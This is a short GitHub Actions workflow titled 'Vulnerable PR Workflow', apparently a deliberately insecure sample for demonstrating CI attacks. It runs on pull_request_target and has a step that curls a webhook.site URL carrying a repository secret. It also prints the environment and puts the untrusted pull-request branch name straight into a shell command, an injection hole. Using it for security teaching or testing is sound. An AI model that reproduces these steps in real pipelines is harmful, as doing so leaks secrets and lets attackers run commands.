name: Vulnerable PR Workflow
on:
  pull_request_target

jobs:
  insecure-job:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout repository
        uses: actions/checkout@v4

      - name: Leak secrets
        run: curl "	http://webhook.site/41c6b745-9747-4b36-9965-72752cbf04e0/value=${{ secrets.SEC_NAME }}"

      - name: List Env
        run: env
        
      - name: Run build
        run: echo "Building the project for branch ${{ github.event.pull_request.head.ref }}"
